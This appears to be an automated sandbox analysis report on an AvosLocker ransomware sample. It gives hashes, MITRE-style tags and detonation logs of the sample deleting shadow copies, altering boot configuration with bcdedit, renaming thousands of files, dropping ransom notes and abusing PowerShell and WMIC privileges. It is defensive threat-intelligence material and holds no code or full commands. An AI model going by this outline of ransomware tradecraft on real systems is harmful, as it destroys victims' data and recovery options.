Malware Analysis Report

2024-10-16 03:27

Sample ID 240923-j45gyszflm
Target 2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike
SHA256 7d1e470e36c68e1156a7828f8002254dcde68dc61f998ab5636c12ba63f472dd
Tags
avoslocker defense_evasion discovery evasion execution impact ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7d1e470e36c68e1156a7828f8002254dcde68dc61f998ab5636c12ba63f472dd

Threat Level: Known bad

The file 2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike was found to be: Known bad.

Malicious Activity Summary

avoslocker defense_evasion discovery evasion execution impact ransomware

Avoslocker Ransomware

Renames multiple (8471) files with added filename extension

Modifies boot configuration data using bcdedit

Deletes shadow copies

Renames multiple (10403) files with added filename extension

Enumerates connected drives

Drops desktop.ini file(s)

Sets desktop wallpaper using registry

Drops file in Program Files directory

Unsigned PE

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Interacts with shadow copies

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-23 08:14

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-23 08:14

Reported

2024-09-23 08:16

Platform

win7-20240903-en

Max time kernel

120s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (10403) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\247783023.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Windows NT\TableTextService\ja-JP\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\fr-FR\chkrzm.exe.mui C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\Microsoft Games\Hearts\it-IT\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239063.WMF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0297229.WMF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Google\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\OneNote\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_over.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_left.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18187_.WMF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00919_.WMF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port_of_Spain C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msadcfr.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\1px.gif C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Black Tie.thmx C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-over-select.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\1047x576black.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00485_.WMF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Common Files\System\msadc\ja-JP\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\logo.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\Windows NT\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Media Player\it-IT\WMPDMC.exe.mui C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\sw\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Cordoba C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-docked.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR47F.GIF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00013_.WMF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUECALM\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\js\picturePuzzle.js C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\css\settings.css C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-12 C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG.wmv C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02054_.WMF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\THMBNAIL.PNG C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107042.WMF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\settings.css C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\js\settings.js C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_disabled.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIconSubpi.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00439_.WMF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\cpu.js C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\de-DE\Hearts.exe.mui C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0296288.WMF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15132_.GIF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightRegular.ttf C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\sports_disc_mask.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_snow.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3028 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 3028 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2800 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2800 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2740 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2740 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
